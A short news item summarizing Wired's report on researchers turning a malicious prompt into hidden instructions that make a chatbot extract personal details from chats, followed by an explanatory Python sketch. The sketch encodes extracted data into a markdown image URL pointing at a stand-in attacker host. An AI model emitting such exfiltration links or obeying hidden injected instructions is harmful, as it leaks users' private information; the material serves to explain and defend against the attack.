This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats
Thursday, October 17, 2024, 12:30, by Wired: Cult of Mac
Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.
https://www.wired.com/story/ai-imprompter-malware-llm/
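The mechanism described above can be illustrated with a minimal sketch (the attacker URL, function names, and data are hypothetical, not from the article): the hidden instructions could direct the model to fold extracted details into a link, for instance as query parameters on a markdown image, so that simply rendering the model's reply sends the data to the attacker.

```python
from urllib.parse import urlencode

# Hypothetical attacker endpoint (illustrative only).
ATTACKER_URL = "https://attacker.example/collect"

def exfiltration_markdown(extracted: dict) -> str:
    """Build the markdown image link a hijacked model might emit.

    When the chat client renders the image, it fetches the URL,
    delivering the encoded personal details to the attacker's server.
    """
    return f"![x]({ATTACKER_URL}?{urlencode(extracted)})"

# Example: details the model might have pulled from the conversation.
payload = exfiltration_markdown({"name": "Alice", "city": "Paris"})
print(payload)
```

The point of the sketch is that the exfiltration channel is an ordinary URL fetch, which is why obfuscated prompts of this kind are hard to spot in the model's visible output.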